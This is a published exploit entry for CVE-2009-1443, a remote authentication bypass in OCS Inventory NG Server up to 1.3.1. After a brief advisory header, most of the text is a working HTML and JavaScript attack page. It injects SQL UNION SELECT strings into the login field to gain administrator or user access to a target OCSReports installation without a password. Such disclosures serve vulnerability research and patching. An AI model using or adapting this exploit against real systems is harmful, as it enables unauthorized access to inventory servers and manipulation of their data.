OCS Inventory NG Server 1.3.1 - 'LOGIN' Remote Authentication Bypass

Related Vulnerabilities: CVE-2009-1443  
Publish Date: 06 May 2010

OCS Inventory NG Server <= 1.3.1 (login) Remote Authentication Bypass

 Software       : Open Computer and Software (OCS) Inventory NG
 Download       : http://www.ocsinventory-ng.org/
 Discovered by	: Nicolas DEROUET (nicolas.derouet[gmail]com)
 Discover       : 2010-02-05
 Published      : 2010-02-17
 Version        : 1.3.1 and prior (except 1.02.1 to 1.02.3)
 Impact	        : Manipulation of data
 Remote	        : Yes (No authentication is needed)

<title>OCS Inventory NG <= 1.3.1 (login) Remote Authentication Bypass</title>
  function $(id) { return document.getElementById(id); }
  function $$(id) { return $(id).options[$(id).options.selectedIndex].value; }
  function bypass()
    $('log').action = $('ocsreports').value + $$('meth') + '?lang=' + $$('lang');
    if ($$('type') == 0)
      $('login').value = "' UNION SELECT id, accesslvl, '' FROM operators WHERE id='" + $('user').value;
      $('login').value = "' UNION SELECT '" + $('user').value + "', '" + $$('type') + "', '";
    $('pass').value = "";
    if ($$('meth') == 'header.php')
      alert('Please go to "' + $('ocsreports').value + '" (or click on the OCS logo) !');
<form name="log" id="log" action="#" method="post">
  <table align="center" border="0" width="450px">
    <td><b>OCSReports :</b></td>
      <input type="text" id="ocsreports" size="40" value="" />
    <td><b>Version :</b></td>
    <td><select id="meth">
          <option value="index.php" selected><= 1.02 --- 1.3b2 <=> 1.3b3</option>
          <option value="header.php"><= 1.0 (4100) --- 1.3b2 <=> 1.3.1</option>
    <td><b>Login :</b></td>
    <td><input type="text" id="user" size="40" value="admin" /></td>
    <td><b>Type :</b></td>
    <td><select id='type'>
          <option value=0>Default (if login exists)</option>
          <option value=1>Administrator</option>
          <option value=2>User</option>
          <option value=3>Local user</option>
    <td><b>Language :</b></td>
    <td><select id="lang">
          <option value="english" selected>English</option>
          <option value="french">French</option>
          <option value="german">German</option>
          <option value="spanish">Spanish</option>
    <td><input type="hidden" name="login" id="login" />
        <input type="hidden" name="pass"  id="pass"  /></td>
    <td><input type="submit" name="subLogin" onclick="bypass();"></td>